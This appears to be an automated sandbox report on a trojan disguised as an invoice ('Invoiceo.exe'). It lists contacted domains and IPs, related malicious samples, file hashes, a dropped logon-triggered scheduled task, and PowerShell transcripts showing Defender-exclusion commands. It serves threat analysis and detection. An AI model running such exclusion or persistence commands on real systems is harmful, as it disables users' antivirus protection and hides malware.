http://www.tabuk24.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kontrey.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kontrey.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.foodbyroyalbites.com/csi/www.bioshope.online	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wristaidmd.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adtlive.com/csi/www.rare-snare.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ss01center.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tabuk24.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.naturaldesiproducts.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ss01center.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tabuk24.com/csi/www.swim-maki.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.rare-snare.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.naturaldesiproducts.com/csi/M	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kontrey.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bioshope.online/csi/www.wristaidmd.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bahama-id.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uspaypausa.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wristaidmd.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rare-snare.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tabuk24.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
154.207.58.218	www.tabuk24.com	Seychelles		136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	402845
Start date:	03.05.2021
Start time:	14:49:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Invoiceo.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@19/19@3/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 30.1% (good quality ratio 28.1%) Quality average: 70.8% Quality standard deviation: 30.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 145 Number of non-executed functions: 263
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Excluded IPs from analysis (whitelisted): 52.255.188.83, 20.50.102.62, 204.79.197.200, 13.107.21.200, 104.42.151.234, 92.122.145.220, 52.147.198.201, 13.64.90.137, 23.57.80.111, 51.103.5.186, 205.185.216.10, 205.185.216.42, 92.122.213.247, 92.122.213.249, 20.54.26.129, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:50:05	API Interceptor	2x Sleep call for process: Invoiceo.exe modified
14:50:49	API Interceptor	105x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
XIAOZHIYUN1-AS-APICIDCNETWORKUS	x16jmZMFrN.exe	Get hash	malicious	Browse	154.207.58.69
	ppc_unpacked	Get hash	malicious	Browse	156.234.199.243
	NQ1vVJKBcH.exe	Get hash	malicious	Browse	156.253.78.210
	Camscanner.New Order.09878766.exe	Get hash	malicious	Browse	154.222.72.30
	RDAx9iDSEL.exe	Get hash	malicious	Browse	156.241.53.161
	REF # 166060421.doc	Get hash	malicious	Browse	154.207.35.111
	FORM C.xlsx	Get hash	malicious	Browse	156.255.140.216
	5PthEm83NG.exe	Get hash	malicious	Browse	156.255.140.216
	od3Y2SFzdP.rtf	Get hash	malicious	Browse	156.226.160.44
	7665585857.docx	Get hash	malicious	Browse	156.226.160.44
	q3uHPdoxWP.exe	Get hash	malicious	Browse	156.241.53.161
	payment invoice.exe	Get hash	malicious	Browse	156.254.140.36
	uNttFPI36y.exe	Get hash	malicious	Browse	156.255.140.216
	9JFrEPf5w7.exe	Get hash	malicious	Browse	154.207.35.105
	PO#EIMG_501_367_089.exe	Get hash	malicious	Browse	156.224.66.218
	PDF Order 01920 FILE GIDA SAN. VE TIC. ANONIM SIRKETI.exe	Get hash	malicious	Browse	164.155.20.27
	Request For Courtesy Call.xlsx	Get hash	malicious	Browse	156.255.140.216
	CATALOG.exe	Get hash	malicious	Browse	156.241.53.167
	PURCHASE ORDER.exe	Get hash	malicious	Browse	156.241.53.167
	Design Template.exe	Get hash	malicious	Browse	156.226.160.56

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoiceo.exe.log Download File
Process:	C:\Users\user\Desktop\Invoiceo.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1406
Entropy (8bit):	5.341099307467139
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
MD5:	E5FA1A53BA6D70E18192AF6AF7CFDBFA
SHA1:	1C076481F11366751B8DA795C98A54DE8D1D82D5
SHA-256:	1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
SHA-512:	77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.993014478972177
Encrypted:	false
SSDEEP:	384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5:	8D5E194411E038C060288366D6766D3D
SHA1:	DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256:	44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512:	21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22332
Entropy (8bit):	5.602163865817749
Encrypted:	false
SSDEEP:	384:jtCDz0iqoAidsgmwSBKnOultIo3D7Q99gxSJUeRe1BMym3Z1AV73nvTOPo64I+50:fPCh4K3ltp3w8xXeN/4XN0
MD5:	8A5ADAC3203440E5B488084BFEB3759E
SHA1:	93594B1C844CDFD2A1CAFAAF3B32ABE214107218
SHA-256:	2B961420315D242E4A681DA21085E6FC4B088DF70C5BBEA721C9172D6066E169
SHA-512:	22ED2555301CFC353B66F9453E5064277208063E0429A6579D40B321F94ECA0DC7C050A6ED75C7E1119133FE28474271E39325D4EFC9FC00180645AE2867F82E
Malicious:	false
Preview:	@...e...................../.............<............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpod1dif.1ty.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvegrtut.myf.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t10emffs.5zu.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vijt5kae.3jh.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_voiu13at.ago.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0wayzft.p4m.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp Download File
Process:	C:\Users\user\Desktop\Invoiceo.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1642
Entropy (8bit):	5.1879886656641165
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBIOtn:cbh47TlNQ//rydbz9I3YODOLNdq3io
MD5:	36AA9FF53886534237FAABD58ADEE6A5
SHA1:	80B6C67B09BB123C60E16C52D66BECBCEC5E5284
SHA-256:	97229E624C1D7C42A3C9996F539A74F461ADD77145F3EAEF9A4A8F81B56D4D8B
SHA-512:	CF3980600E5F013762770D33F2DFA9DA072292E1992D4CB8EF11A387B935A09E49ACA297A5E7ABC0BEEDC7D551B9BAAA1E2705E53283BDB21B2BD753ABE4E770
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\yYxmxiApi.exe Download File
Process:	C:\Users\user\Desktop\Invoiceo.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	767488
Entropy (8bit):	7.926254649230044
Encrypted:	false
SSDEEP:	12288:TXgCvpTVNXNTOGxNwf092eFjux/6VLcviorDC77Fd6LxIKC088VT0/gVwCTpaOMR:TXhvpTfdrR2+j7VLOioretkxIXQ0/bOy
MD5:	8F2489D7CE50E99109AF9925818DAF2B
SHA1:	5481D53E59FDA1E0D849B677E15B410BA6F64FBC
SHA-256:	0013853950647289E952326B93CE46AA3E73DB654367EF3C005E29257DB31FBA
SHA-512:	E68AC0D33DDECB3712068F94B3A1459F57B26A9E74E970CB7F4CE2F1E64341D72294B2907049E738D115807EF9BD9E622483B64C2E2B26CC228DF52A42195268
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.............~.... ........@.. ....................... ............@.................................,...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H...........................(............................................0............(!...(".........(.....o#.........................($......(%......(&......('......((....N..(....o`...()....&..(.....s+........s,........s-........s.........s/............0...........~....o0....+...0...........~....o1....+...0...........~....o2....+...0...........~....o3....+...0...........~....o4....+...0..<........~.....(5.....,!r...p.....(6...o7...s8............~.....+...0......

C:\Users\user\AppData\Roaming\yYxmxiApi.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Invoiceo.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20210503\PowerShell_transcript.065367.35C6bBM3.20210503145014.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5785
Entropy (8bit):	5.404231133025547
Encrypted:	false
SSDEEP:	96:BZbhJNRtqDo1ZHZuPhJNRtqDo1Z4djh7jZ8hJNRtqDo1ZWqrrVZCa:7OTf
MD5:	A20CE8CBBAC4DF52F4C662AB1555669B
SHA1:	26F0BD1E99AA3B9D36B9FF0B53B772602E990AC4
SHA-256:	9A1339776210E234B2B731417E4C19F9A2F30FD2266C9E45C002CEC11818D270
SHA-512:	2C611FEEC0E85BB17802594388DC5D6B85505F06565685997C184FCA188BA5D285DDEF69E498C7129E4AFE466648DDB1A2FD20308537D3A8D4FBB37836878DD5
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210503145037..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 065367 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\yYxmxiApi.exe..Process ID: 6856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210503145037..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\yYxmxiApi.exe..********************..Windows PowerShell transcript start..Start time: 20210503145713..Username: computer\user..RunAs User: computer\user.

C:\Users\user\Documents\20210503\PowerShell_transcript.065367.K12PJCIf.20210503145011.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5701
Entropy (8bit):	5.382675657994007
Encrypted:	false
SSDEEP:	96:BZHhJNYyqDo1ZPWZihJNYyqDo1Zgc6O6E6jZjhJNYyqDo1ZjJ6U6U6EZP:i
MD5:	DB00C29BC4025BA244104A1FB1FC5004
SHA1:	4B55982416EF7A0A1684F821DC34E2BA670288C0
SHA-256:	981EFFD7C1040A8A8E89A4A7A6A3FCCBAF9B36F2D817C3B90612DC4DDFE6B5D9
SHA-512:	19591ADB9545F1D1A636B71DA5832C4348EAB00658AF99AE1355DB449005E8D500567E3A477900C7A27F703C269CC4156DC7EBCF380FA0262B2BD786F7742355
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210503145033..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 065367 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Invoiceo.exe..Process ID: 6584..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210503145034..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Invoiceo.exe..********************..Windows PowerShell transcript start..Start time: 20210503145331..Username: computer\user..RunAs User: computer\user..Configuration Nam

C:\Users\user\Documents\20210503\PowerShell_transcript.065367.wOdK0DyO.20210503145012.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5785
Entropy (8bit):	5.404633230661222
Encrypted:	false
SSDEEP:	96:BZahJN6qDo1ZSZlhJN6qDo1Zljh7jZ4hJN6qDo1ZYFqrrjZ0:O3
MD5:	A20F7E003DC42D0C84652D507FB71EFE
SHA1:	19640C9485EF5EFDB93E853FF7EBE1FE638E2E93
SHA-256:	C9D7CDBCCA64AED559A0102BA59261300D44D845250AF15DB93B19304E895F33
SHA-512:	0130BC43FC6B7EAD1C05B83FF7F4B20EBBC17C55EE89FA2F70A2E587599BA57B24499AC24471D7FD3E315AEF0E1D867A67CB520B44B714335377D631414E077F
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210503145036..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 065367 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\yYxmxiApi.exe..Process ID: 6660..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210503145036..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\yYxmxiApi.exe..********************..Windows PowerShell transcript start..Start time: 20210503145624..Username: computer\user..RunAs User: computer\user.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.926254649230044
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Invoiceo.exe
File size:	767488
MD5:	8f2489d7ce50e99109af9925818daf2b
SHA1:	5481d53e59fda1e0d849b677e15b410ba6f64fbc
SHA256:	0013853950647289e952326b93ce46aa3e73db654367ef3c005e29257db31fba
SHA512:	e68ac0d33ddecb3712068f94b3a1459f57b26a9e74e970cb7f4ce2f1e64341d72294b2907049e738d115807ef9bd9e622483b64c2e2b26cc228df52a42195268
